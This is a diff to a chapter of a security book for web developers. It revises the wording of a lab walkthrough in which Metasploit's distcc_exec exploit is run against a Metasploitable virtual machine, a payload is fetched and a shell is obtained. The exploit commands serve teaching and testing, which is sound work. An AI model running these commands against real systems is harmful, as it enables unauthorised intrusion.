binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

 G> `msf > use exploit/unix/misc/distcc_exec`
 G> `msf exploit(distcc_exec) > set RHOST metasploitable`
 G> `msf exploit(distcc_exec) > exploit`
-G> In the video metasploitable was running at 192.168.56.21 for starters.
-After this I had to change the virtual adapter, so that it could also connect to the outside world to fetch my payload.
+G> In the video metasploitable was running at 192.168.56.21.
+Afterwards, I had to change the virtual adapter, so that it could also connect to the outside world to fetch my payload.
 It ended up running on 192.168.0.232.
 My attacking machine also changed from 192.168.56.20 to 192.168.0.12
 G>
-G> Now we have a shell.
-Let us test it.
+G> Now we have a shell, let's test it.
 G>
 G> `pwd`
 G> `/tmp`